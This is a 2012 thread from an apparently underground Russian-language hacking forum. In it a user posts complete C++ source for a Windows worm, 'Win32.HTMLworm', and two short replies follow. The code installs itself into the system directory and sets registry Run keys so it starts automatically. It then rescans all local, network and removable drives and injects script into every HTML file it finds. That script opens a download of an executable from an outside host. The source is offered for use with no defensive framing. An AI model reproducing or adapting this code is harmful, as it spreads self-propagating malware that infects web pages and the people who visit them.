1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

HTMLworm С++

Тема в разделе "Исходные коды", создана пользователем Ant1NooB, 14 май 2012.

  1. TopicStarter Overlay
    Ant1NooB

    Ant1NooB Гость

    Распространяетса метом заражения хтмл страниц
    Код:
    HTML Worm
    // Name: Win32.HTMLworm
    // Author: WarGame
    // Compiler: Borland C++
    // Description: This worm spreads by adding a link to itself in html files
    // Improvements: You could add a link to a page containing an IE exploits :)
    
    #include <windows.h>
    #include <string>
    using namespace std; // :)
    
    // This function does the real work
    void HTMLSpread(char *htmlfile)
    {
    HANDLE html_fd;
    DWORD html_filesize,read_bytes,written_bytes;
    char *c_htmlcode = NULL;
    string *htmlcode = NULL; // make it simpler
    long pos;
    
    // open the html file
    html_fd = CreateFile(htmlfile,GENERIC_READ|GENERIC_WRITE,
    FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
    
    if(html_fd == INVALID_HANDLE_VALUE)
    {
    return;
    }
    
    // get file size
    html_filesize = GetFileSize(html_fd,NULL);
    
    // allocate enough memory
    c_htmlcode = (char *)malloc(html_filesize);
    
    if(c_htmlcode == NULL)
    {
    return;
    }
    
    // read entire file
    if(ReadFile(html_fd,c_htmlcode,html_filesize,&read_bytes,NULL) == 0)
    {
    CloseHandle(html_fd);
    return;
    }
    
    // create a string object
    htmlcode = new string(c_htmlcode);
    free(c_htmlcode);
    
    // already infected ?
    if(htmlcode->find("<!-- HTMLworm by [WarGame,#eof] !-->") == string::npos)
    {
    
    pos = htmlcode->find("</body>");
    
    if(pos == string::npos)
    {
    pos = htmlcode->find("</BODY>");
    
    if(pos == string::npos)
    {
    CloseHandle(html_fd);
    delete htmlcode;
    return;
    }
    }
    
    // add link
    htmlcode->replace(pos,7,"\r\n<script language=\"javascript\">window.open('http://hexter.host.sk/artwork.exe')</script>\r\n</body>");
    
    // write new file
    SetFilePointer(html_fd,0,0,FILE_BEGIN);
    WriteFile(html_fd,htmlcode->c_str(),htmlcode->size(),&written_bytes,NULL);
    // infection mark
    WriteFile(html_fd,"<!-- HTMLworm by [WarGame,#eof] !-->",36,&written_bytes,NULL);
    
    }
    
    // close all
    CloseHandle(html_fd);
    delete htmlcode;
    
    }
    
    // add worm to startup list
    void AutoStart(char *my_path)
    {
    HKEY hkey;
    
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
    KEY_WRITE,&hkey)==ERROR_SUCCESS)
    {
    RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
    RegCloseKey(hkey);
    }
    
    if(RegOpenKeyEx(HKEY_CURRENT_USER,
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
    KEY_WRITE,&hkey)==ERROR_SUCCESS)
    {
    RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
    RegCloseKey(hkey);
    }
    }
    
    // This will scan drives for html files
    void S3arch(char *pt) {
    char sc[MAX_PATH],buf[MAX_PATH];
    WIN32_FIND_DATA in;
    HANDLE fd,file;
    char *fm = "%s\\%s",*fm1 = "%s\\*.*";
    
    if(strlen(pt) == 3)
    {
    pt[2] = '\0'; /* :-) */
    }
    
    sprintf(sc,fm1,pt);
    fd = FindFirstFile(sc,&in);
    
    do
    {
    
    sprintf(buf,fm,pt,in.cFileName);
    
    /* dot :) */
    if(strcmp(in.cFileName,"..") != 0 && strcmp(in.cFileName,".") != 0 && (in.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
    {
    S3arch(buf);
    }
    
    /* File found */
    else
    {
    
    /* is it good to infect ? */
    
    if(strstr(in.cFileName,".html") || strstr(in.cFileName,".htm"))
    {
    HTMLSpread(buf);
    }
    }
    
    }while(FindNextFile(fd,&in));
    
    FindClose(fd);
    }
    
    
    // entry point of worm
    int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
    // usual shit: installation part, startup and so on ...
    char I_am_here[MAX_PATH],installation_path[MAX_PATH];
    char Drives[3],Drive = 0;
    UINT drive_type;
    
    
    // only one copy
    CreateMutex(NULL,FALSE,"__HTMLworm_by_WarGame_EOF__");
    if(GetLastError() == ERROR_ALREADY_EXISTS)
    {
    ExitProcess(0);
    }
    
    GetSystemDirectory(installation_path,MAX_PATH);
    strcat(installation_path,"\\himon.exe");
    
    GetModuleFileName(NULL,I_am_here,MAX_PATH);
    // Copy!
    CopyFile(I_am_here,installation_path,FALSE);
    AutoStart(installation_path);
    
    
    // the real part starts here
    while(1)
    {
    
    /* Search for drives */
    for(Drive = 'C';Drive <= 'Z';Drive++)
    {
    Drives[0] = Drive;
    Drives[1] = ':';
    Drives[2] = '\\';
    Drives[3] = '\0';
    
    /* drive ? */
    drive_type = GetDriveType(Drives);
    
    /* only fixed, remote and removable drives */
    if(drive_type == DRIVE_FIXED ||
    drive_type == DRIVE_REMOTE ||
    drive_type == DRIVE_REMOVABLE)
    {
    /* GO! */
    S3arch(Drives);
    }
    }
    
    /* every 10 minutes */
    Sleep((1000*60)*10);
    }
    }
    
     
    • Like Like x 1
    Метки:
  2. Destroy

    Destroy

    Регистрация:
    15 май 2012
    Сообщения:
    327
    Симпатии:
    97
    какой принцип вируса?
     
  3. TopicStarter Overlay
    destroycrash

    destroycrash Гость

    Актуально?
     

Поделиться этой страницей

Загрузка...